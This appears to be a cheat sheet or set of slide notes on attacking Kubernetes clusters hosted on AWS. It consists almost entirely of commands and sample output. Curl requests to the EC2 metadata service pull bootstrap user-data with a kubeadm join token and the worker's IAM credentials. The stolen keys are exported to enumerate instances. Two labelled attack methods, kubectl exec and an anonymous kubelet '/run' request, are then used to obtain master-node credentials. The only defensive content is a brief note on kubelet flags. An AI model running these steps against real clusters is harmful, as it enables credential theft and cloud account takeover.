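AWS: node user-data (the bootstrap script, including the kubeadm join token) is served by the instance metadata service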
$ curl -s 169.254.169.254/latest/user-data
#!/bin/bash -xe
...
aws s3 --region $REGION cp s3://...
...
kubeadm join --token mykubeadmtoken 10.0.0.1:443
EC2 metadata API: Obtain IAM Credentials (temporary credentials for the IAM role attached to the worker node)
$ curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/kubernetes-worker-iam-policy
{
"Code" : "Success",
"LastUpdated" : "2017-12-25T00:00:00Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "MyAccessKeyID",
"SecretAccessKey" : "MySecretAccessKey",
"Token" : "MySessionToken",
"Expiration" : "2017-12-25T04:00:00Z"
}
EC2 API: Use IAM Credentials
# Place credentials in ENV vars
$ export AWS_REGION=us-east-1
$ export AWS_ACCESS_KEY_ID=MyAccessKeyID
$ export AWS_SECRET_ACCESS_KEY=MySecretAccessKey
$ export AWS_SESSION_TOKEN=MySessionToken
# Enumerate instances, get all user-data scripts
$ aws ec2 describe-instances
$ aws ec2 describe-instance-attribute --instance-id i-xxxxxxx --attribute userData

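Attack Method 2a: "kubectl exec" into a Pod (a pod that can reach 169.254.169.254 receives the credentials of the node it runs on; here the role name indicates a master node)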
$ kubectl exec -it etcd-000 curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/kubernetes-master-iam-policy
{
"Code" : "Success",
"LastUpdated" : "2017-12-25T00:00:00Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "MasterAccessKeyID",
"SecretAccessKey" : "MasterSecretAccessKey",
"Token" : "MasterSessionToken",
"Expiration" : "2017-12-25T04:00:00Z"
}
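Attack Method 2b: Kubelet API "run cmd" (the request carries no client credentials, so it only works where the kubelet on port 10250 accepts anonymous requests; the kubelet flags --anonymous-auth=false and --authorization-mode=Webhook close this)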
$ curl -sk https://10.0.0.1:10250/run/kube-system/etcd-000/etcd-server -d "cmd=curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/kubernetes-master-iam-policy"
{
"Code" : "Success",
"LastUpdated" : "2017-12-25T00:00:00Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "MasterAccessKeyID",
"SecretAccessKey" : "MasterSecretAccessKey",
"Token" : "MasterSessionToken",
"Expiration" : "2017-12-25T04:00:00Z"
}